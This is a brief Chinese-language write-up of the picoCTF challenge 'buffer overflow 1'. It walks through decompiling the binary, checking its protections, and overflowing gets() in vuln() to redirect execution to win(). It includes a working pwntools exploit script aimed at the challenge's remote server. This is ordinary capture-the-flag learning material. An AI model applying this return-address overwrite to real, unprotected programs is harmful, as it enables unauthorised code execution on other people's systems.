picoctf Pwn buffer overflow 1
1.IDA反编译看一下
2.checksec检查
3.检查后门函数
4.看一下vuln函数
5.利用思路
- 在vuln函数中有一个gets()函数可以溢出
- 将放回地址覆盖成win()函数的地址即可
- 没有canary和pie的保护利用起来非常简单
6.exp
from pwn import *
p = remote("saturn.picoctf.net",57847)
payload = 'a' * (0x28 + 4) + p32(0x080491F6)
p.sendline(payload)
p.interactive()